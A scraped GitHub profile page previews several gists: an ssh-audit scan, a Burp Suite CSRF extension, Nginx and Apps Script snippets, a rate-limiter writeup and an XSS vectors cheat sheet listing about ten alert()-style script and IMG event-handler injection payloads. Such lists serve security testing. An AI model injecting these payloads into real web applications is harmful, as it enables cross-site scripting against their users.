Skip to content

Instantly share code, notes, and snippets.

View freb's full-sized avatar

Jeffrey Stiles freb

15 followers · 15 following
View GitHub Profile
@mattfoster
mattfoster / ssh-audit
Created April 23, 2017 15:48
ssh-audit scan-me.nmap.org
% ssh-audit scan-me.nmap.org
# general
(gen) banner: SSH-2.0-OpenSSH_6.6.1
(gen) software: OpenSSH 6.6.1
(gen) compatibility: OpenSSH 6.5-6.6, Dropbear SSH 2013.62+ (some functionality from 0.52)
(gen) compression: enabled (zlib@openssh.com)
# key exchange algorithms
(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
@pajswigger
pajswigger / csrf-session-handler.py
Created June 26, 2017 08:34
from burp import IBurpExtender, ISessionHandlingAction
class BurpExtender(IBurpExtender):
def registerExtenderCallbacks(self, callbacks):
callbacks.registerSessionHandlingAction(CsrfSessionHandler(callbacks.getHelpers()))
class CsrfSessionHandler(ISessionHandlingAction):
def __init__(self, helpers):
@mikhailov
mikhailov / gist:9639593
Last active November 10, 2023 22:04
Nginx S3 Proxy with caching
events {
worker_connections 1024;
}
http {
default_type text/html;
access_log /dev/stdout;
sendfile on;
keepalive_timeout 65;
@jfcherng
jfcherng / st4-changelog.md
Last active February 10, 2024 20:21
Sublime Text 4 changelog just because it's not on the official website yet.
@rushimusmaximus
rushimusmaximus / gmailToSlack.js
Last active March 2, 2024 13:00
Google Apps Script to post filtered Gmail messages to Slack
/*
The intent of this script is for posting filtered Gmail messages to Slack.
This script could be used on its own with manually-marked messages, but it
is most useful it when combined with a Gmail filter. The script assumes that
target messages have had a specific label set on them and have been starred.
The Apps Script can then be set to run periodically.
2015/02 cmyers, rush
@kurobeats
kurobeats / xss_vectors.txt
Last active March 20, 2024 13:47
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@pamelafox
pamelafox / exportjson.js
Last active March 30, 2024 21:00
Google Spreadsheet JSON ExportHow-to at http://blog.pamelafox.org/2013/06/exporting-google-spreadsheet-as-json.html
// Includes functions for exporting active sheet or all sheets as JSON object (also Python object syntax compatible).
// Tweak the makePrettyJSON_ function to customize what kind of JSON to export.
var FORMAT_ONELINE = 'One-line';
var FORMAT_MULTILINE = 'Multi-line';
var FORMAT_PRETTY = 'Pretty';
var LANGUAGE_JS = 'JavaScript';
var LANGUAGE_PYTHON = 'Python';
@ptarjan
ptarjan / 0-rate-limiters.md
Created March 29, 2017 20:44

Scaling your API with rate limiters

The following are examples of the four types rate limiters discussed in the accompanying blog post. In the examples below I've used pseudocode-like Ruby, so if you're unfamiliar with Ruby you should be able to easily translate this approach to other languages. Complete examples in Ruby are also provided later in this gist.

In most cases you'll want all these examples to be classes, but I've used simple functions here to keep the code samples brief.

Request rate limiter

This uses a basic token bucket algorithm and relies on the fact that Redis scripts execute atomically. No other operations can run between fetching the count and writing the new count.